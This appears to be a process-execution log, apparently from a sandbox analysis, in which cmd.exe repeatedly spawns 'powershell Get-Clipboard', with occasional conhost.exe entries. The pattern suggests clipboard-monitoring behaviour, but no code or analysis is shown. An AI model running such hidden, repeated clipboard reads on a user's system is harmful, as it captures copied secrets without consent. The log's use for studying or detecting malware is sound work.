C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
